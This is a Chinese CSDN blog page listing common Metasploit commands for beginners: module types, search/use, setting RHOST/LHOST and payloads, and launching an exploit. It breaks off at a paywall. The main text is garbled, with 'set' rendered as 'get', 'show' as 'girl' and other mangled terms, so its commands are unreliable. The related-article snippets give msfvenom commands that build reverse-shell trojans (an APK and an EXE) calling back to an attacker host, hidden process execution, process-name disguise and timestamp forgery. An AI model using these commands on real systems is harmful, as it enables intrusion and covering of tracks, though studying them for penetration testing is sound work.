MSF常用命令

最新推荐文章于 2024-06-13 01:34:31 发布
最新推荐文章于 2024-06-13 01:34:31 发布
阅读量2.5k 收藏 19
点赞数
分类专栏: web安全 渗透 小白 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32108547/article/details/109192268
版权
本文介绍了Metasploit框架的基础知识和常用命令,包括Msfconsole的使用、模块分类(exploits, auxiliary, payloads, encodes, post)以及渗透测试过程。通过实例演示了如何搜索漏洞、设置攻击参数、生成木马、远程连接、端口转发、提权、键盘记录等功能,强调了Metasploit在后渗透测试阶段的重要性。" 133766904,20015744,STM32嵌入式数字电子秤设计,"['stm32', '嵌入式硬件', '单片机', '嵌入式']
摘要由CSDN通过智能技术生成

Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。

Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。

Msfconsole 开启msf

Msfconsole -h 协助选择项

Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数

控制模块详细介绍:

Exploits 渗入进攻控制模块 主要用于进攻方式

Auxiliary 輔助控制模块 主要用于信息内容搜集

Payloads 进攻荷载控制模块 主要用于进攻实际效果、总体目标

Encodes 编号控制模块 主要用于编码转换、掩藏

Post 后渗透测试控制模块 主要用于渗入后的解决,比如留有侧门等

通常应用步骤:

search 名字 检索系统漏洞

use 控制模块 挑选进攻控制模块

get RHOST ip 设定进攻ip

get RPORT 445 设定进攻端口号

girl payloads 查询能用payloads

get payload windows/meterperter/bind_tcp -设定进攻荷载

get LHOST ip 监视应用程序ip

get LPORT 4444 设定监视的端口号

girl options 查询设定好的主要参数

exploit 进行进攻

info 查询所属控制模块的信息内容

back 撤出当今系统漏洞控制模块,挑选别的的系统漏洞控制模块

exploits:运用漏洞开展进攻

payload:取得成功 exploit 以后,真实在总体目标系统软件实行的编码或命令

con

最低0.47元/天 解锁文章
L_lemo004
关注
  • 0
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
KaliLinux-MSF-常用命令
Candour_0的博客
03-15 428
msfconsole。
msf命令汇总
06-21
msf的一些实用命令 希望有用 尤其是对初学者帮助会很大
MSF使用教程
qq_45317844的博客
07-12 1525
run autoroute -s 192.168.159.0/24 #添加到目标环境网络,当你相连接一个网络发现不通的时候,可以设置一个路由试试,一般网络中没有设置围栏的情况下,是可以通的。-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload。timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt。
msfconsole和msfvenom大全kali
最新发布
m0_73960954的博客
06-13 988
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口。cat 读取文件内容到屏幕。meterpreter > execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互。execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互。
MSF控制台命令
分享学习网络的点点滴滴
12-27 506
首先启动msfdb。
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2315
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
MSF基本使用和控制台命令
分享学习网络的点点滴滴
12-26 929
Msfconsole使用接口○ 最流行的用户接口○ 几乎可以使用全部MSF功能○ 控制台命令支持TAB自动补全○ 支持外部命令的执行(系统命令等)○ 点击鼠标启动 / msfconsole -h -q -r -v / exit○ help /?
msf命令
qq_52469895的博客
05-19 2150
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当进程的p...
msfconsole命令大全,以及使用说明
m0_48096446的博客
07-05 5592
渗透工具 msfconsole命令大全
MSF技术总结
05-07
MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 MSF 由三个主要...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
0x04 Meterpreter 的常用命令 Meterpreter 提供了一系列命令,用于进行各种操作: 1. 基本命令: - `interact id`:将当会话切换到指定的信道 ID,方便管理多个会话。 2. 文件系统命令: - `download file_...
内网MSF11111
01-05
内网渗透测试中,Metasploit(MSF)是一个常用的安全工具,用于模拟攻击和漏洞利用。本文将详细讲解如何在内网环境中配置MSF,包括PostgreSQL数据库的安装、管理以及MSF数据库的设置。 首先,安装PostgreSQL数据库...
linux系统安装msf的过程详解
09-14
MSF有一些常用命令,例如: - `msfconsole`:启动MSF控制台。 - `msfdb`:管理数据库,如初始化数据库(`init`)、重启数据库(`restart`)等。 - `msfupdate`:更新MSF到最新版本。 - `msfvenom`:生成各种恶意代码,...
msf(安卓)
king丶
01-08 1167
安卓 制作木马 进入msfconsole msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.1LPORT=12345 R > test.apk use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST192.168.18.250 set LPORT 12345 exploit 将te...
MSF使用1
xhscxj的博客
06-12 3432
进入kali中文件,将原有的源注释掉,换上清华的源 进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等) :漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类 :攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 :后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等 :编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过
MSF使用小技巧
永远是少年
06-08 4195
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF使用小技巧。 一、MSF命令行开启 二、MSF退出 三、MSF 数据库导入和导出 四、MSF会话设置
MSF使用总结
qq_44657899的博客
09-25 4165
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
MSF基本使用
浅笑996的博客
11-10 2621
MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload) background 后台 sessions...
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 2754
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
学会MSF常用命令
12-08
以下是MSF常用命令和用法: 1. 查看有哪些命令和命令用法: ```console msf6 > ? ``` 该命令可以列出所有可用的命令和命令用法。 2. 设置变量: ```console msf6 > set <变量名> <变量值> ``` 该命令可以设置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值